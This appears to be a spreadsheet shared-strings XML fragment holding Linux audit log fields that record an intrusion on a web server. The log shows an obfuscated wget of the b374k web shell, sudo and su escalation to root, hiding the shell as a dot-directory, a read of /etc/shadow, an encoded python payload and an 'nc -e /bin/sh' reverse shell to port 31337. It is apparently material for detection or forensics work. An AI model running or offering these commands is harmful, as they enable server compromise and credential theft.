  <si>
    <t>a1="--decode"</t>
  </si>
  <si>
    <t>name="/usr/bin/base64"</t>
  </si>
  <si>
    <t>inode=1441886</t>
  </si>
  <si>
    <t>a0=5591d876d860</t>
  </si>
  <si>
    <t>pid=2867</t>
  </si>
  <si>
    <t>argc=5</t>
  </si>
  <si>
    <t>a0=wget</t>
  </si>
  <si>
    <t>a1=$(echo aHR0cHM6Ly9naXRodWIuY29tL2IzNzRrL2IzNzRrL2FyY2hpdmUvbWFzdGVyLnppcA== a2=| a3=base64</t>
  </si>
  <si>
    <t>a4=--decode)</t>
  </si>
  <si>
    <t>a0=5591d882c770</t>
  </si>
  <si>
    <t>a1=5591d87f0b80</t>
  </si>
  <si>
    <t>ppid=2888</t>
  </si>
  <si>
    <t>pid=2890</t>
  </si>
  <si>
    <t>a0=5591d8827db0</t>
  </si>
  <si>
    <t>a1=5591d876fae0</t>
  </si>
  <si>
    <t>pid=2891</t>
  </si>
  <si>
    <t>comm="sudo"</t>
  </si>
  <si>
    <t>exe="/usr/bin/sudo"</t>
  </si>
  <si>
    <t>key="priv_esc"</t>
  </si>
  <si>
    <t>a0="sudo"</t>
  </si>
  <si>
    <t>a1="wget"</t>
  </si>
  <si>
    <t>a2="https://github.com/b374k/b374k/archive/master.zip"</t>
  </si>
  <si>
    <t>name="/usr/bin/sudo"</t>
  </si>
  <si>
    <t>inode=1443067</t>
  </si>
  <si>
    <t>exit=3</t>
  </si>
  <si>
    <t>a1=7f66a1b79df7</t>
  </si>
  <si>
    <t>euid=1</t>
  </si>
  <si>
    <t>fsuid=1</t>
  </si>
  <si>
    <t>name="/etc/sudoers"</t>
  </si>
  <si>
    <t>inode=2359503</t>
  </si>
  <si>
    <t>dev=08:01 mode=0100440</t>
  </si>
  <si>
    <t>exit=5</t>
  </si>
  <si>
    <t>a1=7f66a23cb2a3</t>
  </si>
  <si>
    <t>hostname=? addr=? terminal=/dev/pts/3</t>
  </si>
  <si>
    <t>msg='cwd="/var/www/html"</t>
  </si>
  <si>
    <t>cmd=776765742068747470733A2F2F6769746875622E636F6D2F623337346B2F623337346B2F617263686976652F6D61737465722E7A6970</t>
  </si>
  <si>
    <t>terminal=pts/3</t>
  </si>
  <si>
    <t>msg='op=PAM:setcred acct="root"</t>
  </si>
  <si>
    <t>msg='op=PAM:session_open acct="root"</t>
  </si>
  <si>
    <t>a0=5620e9bccb78</t>
  </si>
  <si>
    <t>a1=5620e9bd4fa8</t>
  </si>
  <si>
    <t>a2=5620e9bc53d0</t>
  </si>
  <si>
    <t>ppid=2891</t>
  </si>
  <si>
    <t>pid=2898</t>
  </si>
  <si>
    <t>a1="https://github.com/b374k/b374k/archive/master.zip"</t>
  </si>
  <si>
    <t>msg='op=PAM:session_close acct="root"</t>
  </si>
  <si>
    <t>a0=5591d8713c50</t>
  </si>
  <si>
    <t>a1=5591d882d0a0</t>
  </si>
  <si>
    <t>pid=2945</t>
  </si>
  <si>
    <t>a1="https://tfj.tjfijl.frl/a12d7a9eb2bb6efc2478a9011f112849/Izpmu7xHHdc"</t>
  </si>
  <si>
    <t>a0=5591d882d7b0</t>
  </si>
  <si>
    <t>a1=5591d8826260</t>
  </si>
  <si>
    <t>pid=2990</t>
  </si>
  <si>
    <t>a1="http://archive.ubuntu.com/ubuntu/pool/universe/p/python-pip/python-pip_9.0.1-2_all.deb"</t>
  </si>
  <si>
    <t>a0=5591d8786e60</t>
  </si>
  <si>
    <t>a1=5591d8701be0</t>
  </si>
  <si>
    <t>pid=3000</t>
  </si>
  <si>
    <t>a2="http://archive.ubuntu.com/ubuntu/pool/universe/p/python-pip/python-pip_9.0.1-2_all.deb"</t>
  </si>
  <si>
    <t>a1=7ffacb168df7</t>
  </si>
  <si>
    <t>msg='cwd="/var"</t>
  </si>
  <si>
    <t>cmd=7767657420687474703A2F2F617263686976652E7562756E74752E636F6D2F7562756E74752F706F6F6C2F756E6976657273652F702F707974686F6E2D7069702F707974686F6E2D7069705F392E302E312D325F616C6C2E646562</t>
  </si>
  <si>
    <t>a0=560348d9cb78</t>
  </si>
  <si>
    <t>a1=560348da4fa8</t>
  </si>
  <si>
    <t>a2=560348d96bc0</t>
  </si>
  <si>
    <t>ppid=3000</t>
  </si>
  <si>
    <t>pid=3001</t>
  </si>
  <si>
    <t>a1=5591d876d860</t>
  </si>
  <si>
    <t>pid=3060</t>
  </si>
  <si>
    <t>a1="https://www.robotstxt.org/robots.txt"</t>
  </si>
  <si>
    <t>pid=1</t>
  </si>
  <si>
    <t>msg='unit=anacron</t>
  </si>
  <si>
    <t>comm="systemd"</t>
  </si>
  <si>
    <t>exe="/lib/systemd/systemd"</t>
  </si>
  <si>
    <t>hostname=? addr=? terminal=? res=success'</t>
  </si>
  <si>
    <t>a0=56151ad82400</t>
  </si>
  <si>
    <t>a1=56151ae7ac90</t>
  </si>
  <si>
    <t>a2=56151ae71f00</t>
  </si>
  <si>
    <t>a3=4</t>
  </si>
  <si>
    <t>pid=3089</t>
  </si>
  <si>
    <t>comm="anacron"</t>
  </si>
  <si>
    <t>exe="/usr/sbin/anacron"</t>
  </si>
  <si>
    <t>a0="/usr/sbin/anacron"</t>
  </si>
  <si>
    <t>a1="-dsq"</t>
  </si>
  <si>
    <t>name="/usr/sbin/anacron"</t>
  </si>
  <si>
    <t>inode=1452402</t>
  </si>
  <si>
    <t>a0=5591d8702100</t>
  </si>
  <si>
    <t>a1=5591d8712890</t>
  </si>
  <si>
    <t>pid=3199</t>
  </si>
  <si>
    <t>a1="unzip"</t>
  </si>
  <si>
    <t>a2="master.zip"</t>
  </si>
  <si>
    <t>a1=7f0fc5863df7</t>
  </si>
  <si>
    <t>cmd=756E7A6970206D61737465722E7A6970</t>
  </si>
  <si>
    <t>a0=5619bc7adb78</t>
  </si>
  <si>
    <t>a1=5619bc7b5fa8</t>
  </si>
  <si>
    <t>a2=5619bc7a79f0</t>
  </si>
  <si>
    <t>ppid=3199</t>
  </si>
  <si>
    <t>pid=3200</t>
  </si>
  <si>
    <t>comm="unzip"</t>
  </si>
  <si>
    <t>exe="/usr/bin/unzip"</t>
  </si>
  <si>
    <t>a0="unzip"</t>
  </si>
  <si>
    <t>a1="master.zip"</t>
  </si>
  <si>
    <t>name="/usr/bin/unzip"</t>
  </si>
  <si>
    <t>inode=1443168</t>
  </si>
  <si>
    <t>syscall=90</t>
  </si>
  <si>
    <t>a0=55f162176420</t>
  </si>
  <si>
    <t>a1=1ed</t>
  </si>
  <si>
    <t>a2=55f1620861d8</t>
  </si>
  <si>
    <t>a3=fffffff3</t>
  </si>
  <si>
    <t>name="b374k-master/" inode=2101648</t>
  </si>
  <si>
    <t>dev=08:01 mode=040755</t>
  </si>
  <si>
    <t>a0=4</t>
  </si>
  <si>
    <t>a1=1a4</t>
  </si>
  <si>
    <t>name=(null) inode=2101649</t>
  </si>
  <si>
    <t>dev=08:01 mode=0100644</t>
  </si>
  <si>
    <t>name=(null) inode=2101650</t>
  </si>
  <si>
    <t>a2=55f162086280</t>
  </si>
  <si>
    <t>a3=ffffffee</t>
  </si>
  <si>
    <t>name="b374k-master/base/" inode=2101651</t>
  </si>
  <si>
    <t>name=(null) inode=2101652</t>
  </si>
  <si>
    <t>name=(null) inode=2101653</t>
  </si>
  <si>
    <t>name=(null) inode=2101654</t>
  </si>
  <si>
    <t>name=(null) inode=2101655</t>
  </si>
  <si>
    <t>name=(null) inode=2101656</t>
  </si>
  <si>
    <t>name=(null) inode=2101657</t>
  </si>
  <si>
    <t>name=(null) inode=2101658</t>
  </si>
  <si>
    <t>name=(null) inode=2101659</t>
  </si>
  <si>
    <t>name=(null) inode=2101660</t>
  </si>
  <si>
    <t>name=(null) inode=2101661</t>
  </si>
  <si>
    <t>a2=55f1620864e8</t>
  </si>
  <si>
    <t>a3=ffffffec</t>
  </si>
  <si>
    <t>name="b374k-master/module/" inode=2101662</t>
  </si>
  <si>
    <t>name=(null) inode=2101663</t>
  </si>
  <si>
    <t>name=(null) inode=2101664</t>
  </si>
  <si>
    <t>name=(null) inode=2101665</t>
  </si>
  <si>
    <t>name=(null) inode=2101666</t>
  </si>
  <si>
    <t>name=(null) inode=2101667</t>
  </si>
  <si>
    <t>name=(null) inode=2101668</t>
  </si>
  <si>
    <t>name=(null) inode=2101670</t>
  </si>
  <si>
    <t>name=(null) inode=2101671</t>
  </si>
  <si>
    <t>name=(null) inode=2101672</t>
  </si>
  <si>
    <t>name=(null) inode=2101673</t>
  </si>
  <si>
    <t>name=(null) inode=2101674</t>
  </si>
  <si>
    <t>name=(null) inode=2101675</t>
  </si>
  <si>
    <t>a2=55f1620867c0</t>
  </si>
  <si>
    <t>a3=ffffffed</t>
  </si>
  <si>
    <t>name="b374k-master/theme/" inode=2101676</t>
  </si>
  <si>
    <t>name=(null) inode=2101677</t>
  </si>
  <si>
    <t>name=(null) inode=2101678</t>
  </si>
  <si>
    <t>name=(null) inode=2101679</t>
  </si>
  <si>
    <t>name=(null) inode=2101680</t>
  </si>
  <si>
    <t>name=(null) inode=2101681</t>
  </si>
  <si>
    <t>name=(null) inode=2101682</t>
  </si>
  <si>
    <t>a0=55f163602bc0</t>
  </si>
  <si>
    <t>a2=10</t>
  </si>
  <si>
    <t>a0=55f163602b50</t>
  </si>
  <si>
    <t>a2=55f1635ea010</t>
  </si>
  <si>
    <t>a0=55f1636027b0</t>
  </si>
  <si>
    <t>a0=55f1635fe550</t>
  </si>
  <si>
    <t>a0=5591d88270b0</t>
  </si>
  <si>
    <t>a1=5591d882f3f0</t>
  </si>
  <si>
    <t>pid=3248</t>
  </si>
  <si>
    <t>a1="su"</t>
  </si>
  <si>
    <t>a1=7f5a49e1fdf7</t>
  </si>
  <si>
    <t>cmd="su"</t>
  </si>
  <si>
    <t>a0=55f6df2f0b78</t>
  </si>
  <si>
    <t>a1=55f6df2f1438</t>
  </si>
  <si>
    <t>a2=55f6df2ea9d0</t>
  </si>
  <si>
    <t>ppid=3248</t>
  </si>
  <si>
    <t>pid=3249</t>
  </si>
  <si>
    <t>comm="su"</t>
  </si>
  <si>
    <t>exe="/bin/su"</t>
  </si>
  <si>
    <t>a0="su"</t>
  </si>
  <si>
    <t>name="/bin/su"</t>
  </si>
  <si>
    <t>inode=2228381</t>
  </si>
  <si>
    <t>msg='op=PAM:authentication acct="root"</t>
  </si>
  <si>
    <t>a1=7f0f2e71a2a3</t>
  </si>
  <si>
    <t>msg='op=PAM:accounting acct="root"</t>
  </si>
  <si>
    <t>pid=3250</t>
  </si>
  <si>
    <t>msg='op=su</t>
  </si>
  <si>
    <t>acct="root"</t>
  </si>
  <si>
    <t>hostname=localhost</t>
  </si>
  <si>
    <t>addr=127.0.0.1 terminal=/dev/pts/3</t>
  </si>
  <si>
    <t>a0=5566b6d9a710</t>
  </si>
  <si>
    <t>a1=7ffea72bdfc0</t>
  </si>
  <si>
    <t>a2=5566b6d91020</t>
  </si>
  <si>
    <t>a3=7ffea72be050</t>
  </si>
  <si>
    <t>ppid=3249</t>
  </si>
  <si>
    <t>a0="bash"</t>
  </si>
  <si>
    <t>name="/bin/bash"</t>
  </si>
  <si>
    <t>inode=2228231</t>
  </si>
  <si>
    <t>a0=5626ce2abd00</t>
  </si>
  <si>
    <t>a1=5626ce2ab4d0</t>
  </si>
  <si>
    <t>a2=5626ce2a8830</t>
  </si>
  <si>
    <t>ppid=3251</t>
  </si>
  <si>
    <t>pid=3252</t>
  </si>
  <si>
    <t>comm="groups"</t>
  </si>
  <si>
    <t>exe="/usr/bin/groups"</t>
  </si>
  <si>
    <t>a0="groups"</t>
  </si>
  <si>
    <t>name="/usr/bin/groups"</t>
  </si>
  <si>
    <t>inode=1442219</t>
  </si>
  <si>
    <t>a0=5626ce2ab760</t>
  </si>
  <si>
    <t>a1=0</t>
  </si>
  <si>
    <t>a3=5626ce29c010</t>
  </si>
  <si>
    <t>name="/root/.bash_history" inode=525179</t>
  </si>
  <si>
    <t>a0=5626ce2aaf70</t>
  </si>
  <si>
    <t>a1=5626ce2a9e00</t>
  </si>
  <si>
    <t>a2=5626ce2a99a0</t>
  </si>
  <si>
    <t>ppid=3253</t>
  </si>
  <si>
    <t>pid=3254</t>
  </si>
  <si>
    <t>comm="lesspipe"</t>
  </si>
  <si>
    <t>a1="/usr/bin/lesspipe"</t>
  </si>
  <si>
    <t>name="/usr/bin/lesspipe"</t>
  </si>
  <si>
    <t>inode=2228300</t>
  </si>
  <si>
    <t>a0=556dbe221828</t>
  </si>
  <si>
    <t>a1=556dbd017c00</t>
  </si>
  <si>
    <t>a2=556dbe221798</t>
  </si>
  <si>
    <t>a3=556dbe221010</t>
  </si>
  <si>
    <t>ppid=3254</t>
  </si>
  <si>
    <t>pid=3255</t>
  </si>
  <si>
    <t>comm="basename"</t>
  </si>
  <si>
    <t>exe="/usr/bin/basename"</t>
  </si>
  <si>
    <t>a0="basename"</t>
  </si>
  <si>
    <t>name="/usr/bin/basename"</t>
  </si>
  <si>
    <t>inode=1441887</t>
  </si>
  <si>
    <t>a0=556dbe22ca78</t>
  </si>
  <si>
    <t>a1=556dbe22c9b0</t>
  </si>
  <si>
    <t>a2=556dbe22c9e8</t>
  </si>
  <si>
    <t>ppid=3256</t>
  </si>
  <si>
    <t>pid=3257</t>
  </si>
  <si>
    <t>a0=5626ce2a8fb0</t>
  </si>
  <si>
    <t>a1=5626ce2a9180</t>
  </si>
  <si>
    <t>a2=5626ce2a8bf0</t>
  </si>
  <si>
    <t>ppid=3258</t>
  </si>
  <si>
    <t>pid=3259</t>
  </si>
  <si>
    <t>comm="dircolors"</t>
  </si>
  <si>
    <t>exe="/usr/bin/dircolors"</t>
  </si>
  <si>
    <t>a0="dircolors"</t>
  </si>
  <si>
    <t>a1="-b"</t>
  </si>
  <si>
    <t>name="/usr/bin/dircolors"</t>
  </si>
  <si>
    <t>inode=1442023</t>
  </si>
  <si>
    <t>a0=5626ce2a5b50</t>
  </si>
  <si>
    <t>a0=5626ce2d67a0</t>
  </si>
  <si>
    <t>a1=5626ce2ac090</t>
  </si>
  <si>
    <t>a2=5626ce2afc80</t>
  </si>
  <si>
    <t>ppid=3250</t>
  </si>
  <si>
    <t>pid=3298</t>
  </si>
  <si>
    <t>comm="mv"</t>
  </si>
  <si>
    <t>exe="/bin/mv"</t>
  </si>
  <si>
    <t>a0="mv"</t>
  </si>
  <si>
    <t>a1="b374k-master/" a2=".b374k/"</t>
  </si>
  <si>
    <t>name="/bin/mv"</t>
  </si>
  <si>
    <t>inode=2228320</t>
  </si>
  <si>
    <t>a0=5626ce2b0190</t>
  </si>
  <si>
    <t>a1=5626ce2b0210</t>
  </si>
  <si>
    <t>pid=3365</t>
  </si>
  <si>
    <t>comm="hostname"</t>
  </si>
  <si>
    <t>exe="/bin/hostname"</t>
  </si>
  <si>
    <t>a0="hostname"</t>
  </si>
  <si>
    <t>name="/bin/hostname"</t>
  </si>
  <si>
    <t>inode=2228288</t>
  </si>
  <si>
    <t>a0=5626ce2d7750</t>
  </si>
  <si>
    <t>a1=5626ce2d77d0</t>
  </si>
  <si>
    <t>pid=3413</t>
  </si>
  <si>
    <t>a1="/etc/shadow"</t>
  </si>
  <si>
    <t>a1=7ffe96e5e877</t>
  </si>
  <si>
    <t>a0=560ba1a259c0</t>
  </si>
  <si>
    <t>name="/run/systemd/inhibit/"</t>
  </si>
  <si>
    <t>inode=698</t>
  </si>
  <si>
    <t>name="/run/systemd/inhibit/16.ref" inode=925</t>
  </si>
  <si>
    <t>a0=560ba1a0aaa0</t>
  </si>
  <si>
    <t>name="/run/systemd/inhibit/17.ref" inode=908</t>
  </si>
  <si>
    <t>a0=560ba1a13f60</t>
  </si>
  <si>
    <t>name="/run/systemd/inhibit/18.ref" inode=927</t>
  </si>
  <si>
    <t>a0=5626ce2d78b0</t>
  </si>
  <si>
    <t>a1=5626ce2d7930</t>
  </si>
  <si>
    <t>pid=3512</t>
  </si>
  <si>
    <t>comm="python"</t>
  </si>
  <si>
    <t>exe="/usr/bin/python2.7" key="rootcmd"</t>
  </si>
  <si>
    <t>a0="python"</t>
  </si>
  <si>
    <t>a1="--version"</t>
  </si>
  <si>
    <t>name="/usr/bin/python"</t>
  </si>
  <si>
    <t>inode=1448856</t>
  </si>
  <si>
    <t>a0=5626ce2c7df0</t>
  </si>
  <si>
    <t>a0=5591d87e2010</t>
  </si>
  <si>
    <t>a1=5591d8828ef0</t>
  </si>
  <si>
    <t>pid=3728</t>
  </si>
  <si>
    <t>a1=7f4eb1df3df7</t>
  </si>
  <si>
    <t>msg='cwd="/home/zapdos"</t>
  </si>
  <si>
    <t>a0=55e0b4ba1b78</t>
  </si>
  <si>
    <t>a1=55e0b4ba2438</t>
  </si>
  <si>
    <t>a2=55e0b4b9b9d0</t>
  </si>
  <si>
    <t>ppid=3728</t>
  </si>
  <si>
    <t>pid=3729</t>
  </si>
  <si>
    <t>a1=7f3d0bbb52a3</t>
  </si>
  <si>
    <t>pid=3730</t>
  </si>
  <si>
    <t>a0=56244254e710</t>
  </si>
  <si>
    <t>a1=7ffe045d83b0</t>
  </si>
  <si>
    <t>a2=562442545020</t>
  </si>
  <si>
    <t>a3=7ffe045d8440</t>
  </si>
  <si>
    <t>ppid=3729</t>
  </si>
  <si>
    <t>a0=559558442d00</t>
  </si>
  <si>
    <t>a1=5595584424d0</t>
  </si>
  <si>
    <t>a2=55955843f830</t>
  </si>
  <si>
    <t>ppid=3731</t>
  </si>
  <si>
    <t>pid=3732</t>
  </si>
  <si>
    <t>a0=559558442760</t>
  </si>
  <si>
    <t>a3=559558433010</t>
  </si>
  <si>
    <t>a0=559558441f70</t>
  </si>
  <si>
    <t>a1=559558440e00</t>
  </si>
  <si>
    <t>a2=5595584409a0</t>
  </si>
  <si>
    <t>ppid=3733</t>
  </si>
  <si>
    <t>pid=3734</t>
  </si>
  <si>
    <t>a0=558a83fa2828</t>
  </si>
  <si>
    <t>a1=558a8315cc00</t>
  </si>
  <si>
    <t>a2=558a83fa2798</t>
  </si>
  <si>
    <t>a3=558a83fa2010</t>
  </si>
  <si>
    <t>ppid=3734</t>
  </si>
  <si>
    <t>pid=3735</t>
  </si>
  <si>
    <t>a0=558a83fada78</t>
  </si>
  <si>
    <t>a1=558a83fad9b0</t>
  </si>
  <si>
    <t>a2=558a83fad9e8</t>
  </si>
  <si>
    <t>ppid=3736</t>
  </si>
  <si>
    <t>pid=3737</t>
  </si>
  <si>
    <t>a0=55955843ffb0</t>
  </si>
  <si>
    <t>a1=559558440180</t>
  </si>
  <si>
    <t>a2=55955843fbf0</t>
  </si>
  <si>
    <t>ppid=3738</t>
  </si>
  <si>
    <t>pid=3739</t>
  </si>
  <si>
    <t>a0=55955843cb50</t>
  </si>
  <si>
    <t>a0=55955846ee30</t>
  </si>
  <si>
    <t>a1=559558442430</t>
  </si>
  <si>
    <t>a2=559558446c80</t>
  </si>
  <si>
    <t>ppid=3750</t>
  </si>
  <si>
    <t>pid=3751</t>
  </si>
  <si>
    <t>comm="command-not-fou" exe="/usr/bin/python3.6" key="rootcmd"</t>
  </si>
  <si>
    <t>a1="/usr/lib/command-not-found" a2="--" a3=".log"</t>
  </si>
  <si>
    <t>name="/usr/lib/command-not-found" inode=1443593</t>
  </si>
  <si>
    <t>a0=7f210bf11210</t>
  </si>
  <si>
    <t>a1=7f2109cdde10</t>
  </si>
  <si>
    <t>a2=7ffc5b043390</t>
  </si>
  <si>
    <t>a3=9</t>
  </si>
  <si>
    <t>ppid=3751</t>
  </si>
  <si>
    <t>pid=3754</t>
  </si>
  <si>
    <t>comm="snap"</t>
  </si>
  <si>
    <t>exe="/usr/bin/snap"</t>
  </si>
  <si>
    <t>a0="/usr/bin/snap"</t>
  </si>
  <si>
    <t>a1="advise-snap" a2="--format=json"</t>
  </si>
  <si>
    <t>a3="--command" a4=".log"</t>
  </si>
  <si>
    <t>name="/usr/bin/snap"</t>
  </si>
  <si>
    <t>inode=1443028</t>
  </si>
  <si>
    <t>a0=559558441b10</t>
  </si>
  <si>
    <t>a1=559558441260</t>
  </si>
  <si>
    <t>a2=55955846de60</t>
  </si>
  <si>
    <t>ppid=3730</t>
  </si>
  <si>
    <t>pid=3781</t>
  </si>
  <si>
    <t>a1="-c" a2=6578656328205F5F696D706F72745F5F2820276261736536342720292E6465636F6465737472696E67285F5F696D706F72745F5F2820276261736536342720292E6465636F6465737472696E6728202759336F785A6C67796248526A527A6C355A4559355A6B74445A4870694D6B3579576C6852626B74544E5870694D6B3579576C6852623167784F58426957454A32593235535A6C68355A32356A5C6E4D6A6C7159544A574D457035613356525656706D55315531526770575133686D57444A7364474E484F586C6B526A6C6D53304E6B656D4979546E4A615746467553314D3156465177546B78595C6E4D55355656577457516C5254617A644A534531315754493564574A74566D706B51326476536E70464E5531704E48684F616D6431436B31444E48684E52456C7554454E426545313654544E4C5C6E55327333535559355A6D46584D5864694D306F775744453462306F794F58704B65577431576B6857643031706148704D62567077596B645764574A355A33424D5245467754336C435A6C67795C6E6248514B59306335655752474F575A4C5132523259336C6A63457874556A466A52456C7659336B3162574658654778696254687653314E3365457455633264594D546C77596C6843646D4E755C6E556D5A5965576475596A4E4E626B74544E57746B574546355330684E645170616257787A576C6331646B744461334E4E61577333535568424F5667784F58426957454A32593235535A6C68355C6E5A32356A4D315A705930684B646C6B79566E706A65574E775447314F61474A486432395865574E32575731736455777A546D394B65586475436B7858613235595532733943673D3D5C6E2720292929</t>
  </si>
  <si>
    <t>a0=55955846ff70</t>
  </si>
  <si>
    <t>a1=559558470010</t>
  </si>
  <si>
    <t>pid=3810</t>
  </si>
  <si>
    <t>a0=5595584700a0</t>
  </si>
  <si>
    <t>a1=559558446520</t>
  </si>
  <si>
    <t>pid=3869</t>
  </si>
  <si>
    <t>comm="nc"</t>
  </si>
  <si>
    <t>exe="/bin/nc.openbsd" key="rootcmd"</t>
  </si>
  <si>
    <t>a0="nc"</t>
  </si>
  <si>
    <t>a1="-e" a2="/bin/sh"</t>
  </si>
  <si>
    <t>a3="192.168.0.102" a4="31337"</t>
  </si>
  <si>
    <t>name="/bin/nc"</t>
  </si>
  <si>
    <t>inode=2228323</t>
  </si>
  <si>
    <t>a0=55955846e790</t>
  </si>
  <si>
    <t>a1=55955846fde0</t>
  </si>
  <si>
    <t>pid=3895</t>
  </si>
  <si>
    <t>a1="192.168.0.102" a2="31337"</t>
  </si>
  <si>
    <t>a0=559558470be0</t>
  </si>
  <si>
    <t>a1=55955846ff50</t>
  </si>
  <si>
    <t>pid=3894</t>
  </si>
  <si>
    <t>a0=56151ad221f0</t>
  </si>
  <si>
    <t>a1=56151ae28c90</t>
  </si>
  <si>
    <t>a2=56151adfc2e0</t>
  </si>
  <si>
    <t>a3=56151ad220c0</t>
  </si>
  <si>
    <t>pid=3902</t>
  </si>
  <si>
    <t>comm="sessionclean"</t>
  </si>
  <si>
    <t>a1="-e" a2="/usr/lib/php/sessionclean"</t>
  </si>
  <si>
    <t>name="/usr/lib/php/sessionclean"</t>
  </si>
  <si>
    <t>inode=1455571</t>
  </si>
  <si>
    <t>a0=55742b6abf40</t>
  </si>
  <si>
    <t>a1=55742b6abee0</t>
  </si>
  <si>
    <t>a2=55742b6abf10</t>
  </si>
  <si>
    <t>a3=7f946d5a7810</t>
  </si>
  <si>
    <t>ppid=3902</t>
  </si>
  <si>
    <t>pid=3905</t>
  </si>
  <si>
    <t>a1="-u" a2="-t:" a3="-k" a4="1,1"</t>
  </si>
  <si>
    <t>a0=55742b6abf20</t>
  </si>
  <si>
    <t>a1=55742b6abec8</t>
  </si>
  <si>
    <t>a2=55742b6abef0</t>
  </si>
  <si>
    <t>pid=3904</t>
  </si>
  <si>
    <t>a1="-rn" a2="-t:" a3="-k2,2"</t>
  </si>
  <si>
    <t>a0=55742b6abe60</t>
  </si>
  <si>
    <t>a1=55742b6abea8</t>
  </si>
  <si>
    <t>a2=55742b6abec0</t>
  </si>
  <si>
    <t>ppid=3903</t>
  </si>
  <si>
    <t>pid=3907</t>
  </si>
  <si>
    <t>comm="phpquery"</t>
  </si>
  <si>
    <t>a1="/usr/sbin/phpquery"</t>
  </si>
  <si>
    <t>a2="-V"</t>
  </si>
  <si>
    <t>name="/usr/sbin/phpquery"</t>
  </si>
  <si>
    <t>inode=1455573</t>
  </si>
  <si>
    <t>a0=558dd7dae2c8</t>
  </si>
  <si>
    <t>a1=558dd67b6c70</t>
  </si>
  <si>
    <t>a2=558dd7dae298</t>
  </si>
  <si>
    <t>a3=558dd65ae962</t>
  </si>
  <si>
    <t>ppid=3907</t>
  </si>
  <si>
    <t>pid=3908</t>
  </si>
  <si>
    <t>a2="-" a3="1"</t>
  </si>
  <si>
    <t>a0=558dd7dae3b0</t>
  </si>
  <si>
    <t>a1=558dd7dae368</t>
  </si>
  <si>
    <t>a2=558dd7dae380</t>
  </si>
  <si>
    <t>a3=558dd7dad010</t>
  </si>
  <si>
    <t>pid=3911</t>
  </si>
  <si>
    <t>a1="-rn"</t>
  </si>
  <si>
    <t>a0=558dd7dae5e8</t>
  </si>
  <si>
    <t>a1=558dd7dae560</t>
  </si>
  <si>
    <t>a2=558dd7dae5b8</t>
  </si>
  <si>
    <t>a3=7f48b3df7810</t>
  </si>
  <si>
    <t>ppid=3912</t>
  </si>
  <si>
    <t>pid=3913</t>
  </si>
  <si>
    <t>a1="/usr/lib/php"</t>
  </si>
  <si>
    <t>a2="-mindepth" a3="1"</t>
  </si>
  <si>
    <t>a4="-maxdepth" a5="1"</t>
  </si>
  <si>
    <t>a6="-regex" a7=".*[0-9]\.[0-9]" a8="-printf" a9="%f\n"</t>
  </si>
  <si>
    <t>a0=55742b6ac590</t>
  </si>
  <si>
    <t>a1=55742b6ac380</t>
  </si>
  <si>
    <t>a2=55742b6ac558</t>
  </si>
  <si>
    <t>a3=55742b6ac4e0</t>
  </si>
  <si>
    <t>pid=3914</t>
  </si>
  <si>
    <t>comm="php7.2" exe="/usr/bin/php7.2" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=7</t>
  </si>
  <si>
    <t>a0="php7.2" a1="-c" a2="/etc/php/7.2/apache2/php.ini" a3="-d" a4="error_reporting='~E_ALL'" a5="-r" a6=666F726561636828696E695F6765745F616C6C282273657373696F6E222920617320246B203D3E20247629206563686F2022246B3D222E24765B226C6F63616C5F76616C7565225D2E225C6E223B</t>
  </si>
  <si>
    <t>name="/usr/bin/php7.2" inode=1455627</t>
  </si>
  <si>
    <t>a0=55742b6ac2f8</t>
  </si>
  <si>
    <t>a1=55742b6ac2a8</t>
  </si>
  <si>
    <t>a2=55742b6ac2c8</t>
  </si>
  <si>
    <t>ppid=3915</t>
  </si>
  <si>
    <t>pid=3917</t>
  </si>
  <si>
    <t>a1="-ne" a2="s/^session\.save_handler=\(.*\)$/\1/p"</t>
  </si>
  <si>
    <t>a0=55742b6ac308</t>
  </si>
  <si>
    <t>a1=55742b6ac2b8</t>
  </si>
  <si>
    <t>a2=55742b6ac2d8</t>
  </si>
  <si>
    <t>ppid=3918</t>
  </si>
  <si>
    <t>pid=3920</t>
  </si>
  <si>
    <t>a1="-ne" a2="s/^session\.save_path=\(.*;\)\?\(.*\)$/\2/p"</t>
  </si>
  <si>
    <t>ppid=3921</t>
  </si>
  <si>
    <t>pid=3923</t>
  </si>
  <si>
    <t>a1="-ne" a2="s/^session\.gc_maxlifetime=\(.*\)$/\1/p"</t>
  </si>
  <si>
    <t>a0=55742b6ac2a0</t>
  </si>
  <si>
    <t>a1=55742b6ac250</t>
  </si>
  <si>
    <t>a2=55742b6ac270</t>
  </si>
  <si>
    <t>a3=55742989b962</t>
  </si>
  <si>
    <t>ppid=3924</t>
  </si>
  <si>
    <t>pid=3926</t>
  </si>
  <si>
    <t>a1="-e" a2="s,@VERSION@,7.2,"</t>
  </si>
  <si>
    <t>a0=55742b6acd30</t>
  </si>
  <si>
    <t>a2=55742b6accf8</t>
  </si>
  <si>
    <t>a3=55742b6aef70</t>
  </si>
  <si>
    <t>pid=3927</t>
  </si>
  <si>
    <t>a0="php7.2" a1="-c" a2="/etc/php/7.2/cli/php.ini" a3="-d" a4="error_reporting='~E_ALL'" a5="-r" a6=666F726561636828696E695F6765745F616C6C282273657373696F6E222920617320246B203D3E20247629206563686F2022246B3D222E24765B226C6F63616C5F76616C7565225D2E225C6E223B</t>
  </si>
  <si>
    <t>ppid=3928</t>
  </si>
  <si>
    <t>pid=3930</t>
  </si>
  <si>
    <t>ppid=3931</t>
  </si>
  <si>
    <t>pid=3933</t>
  </si>
  <si>
    <t>ppid=3934</t>
  </si>
  <si>
    <t>pid=3936</t>
  </si>
  <si>
    <t>a0=55742b6ac2c0</t>
  </si>
  <si>
    <t>a1=55742b6ac270</t>
  </si>
  <si>
    <t>a2=55742b6ac290</t>
  </si>
  <si>
    <t>ppid=3937</t>
  </si>
  <si>
    <t>pid=3939</t>
  </si>
  <si>
    <t>a0=55742b6abf00</t>
  </si>
  <si>
    <t>a1=55742b6abeb0</t>
  </si>
  <si>
    <t>a2=55742b6abed0</t>
  </si>
  <si>
    <t>pid=3940</t>
  </si>
  <si>
    <t>comm="pidof"</t>
  </si>
  <si>
    <t>exe="/sbin/killall5"</t>
  </si>
  <si>
    <t>a0="pidof"</t>
  </si>
  <si>
    <t>a1="apache2"</t>
  </si>
  <si>
    <t>a2="php7.2"</t>
  </si>
  <si>
    <t>name="/bin/pidof"</t>
  </si>
  <si>
    <t>inode=917593</t>
  </si>
  <si>
    <t>a0=55742b6ac398</t>
  </si>
  <si>
    <t>a1=55742b6ac2f0</t>
  </si>
  <si>
    <t>a2=55742b6ac368</t>
  </si>
  <si>
    <t>pid=3941</t>
  </si>
  <si>
    <t>a1="/proc/1157/fd"</t>
  </si>
  <si>
